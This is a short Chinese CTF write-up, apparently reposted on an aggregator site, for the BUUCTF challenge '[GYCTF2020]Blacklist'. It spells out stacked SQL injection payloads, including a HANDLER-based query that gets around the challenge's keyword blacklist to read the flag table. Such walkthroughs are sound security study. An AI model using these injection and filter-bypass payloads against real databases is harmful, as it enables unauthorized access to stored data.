当前位置: 代码迷 >> 综合 >> 第三十二题——[GYCTF2020]Blacklist
  详细解决方案

第三十二题——[GYCTF2020]Blacklist

热度:6   发布时间:2023-11-19 19:39:21.0

题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,看到输入栏,猜测使用sql注入

在这里插入图片描述

第二步:使用order by,union select,updata获取回显字段,发现被拦截

在这里插入图片描述

第三步:尝试堆叠注入,输入1';show tables#发现提示flag

在这里插入图片描述

第四步:输入1';show columns from FlagHere;#查看FlagHere字段发现flag

在这里插入图片描述

第五步:获取flag

由于本次屏蔽的关键字很多,所以解锁新姿势使用HANDLER
输入1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#查看FlagHere的第一数据
在这里插入图片描述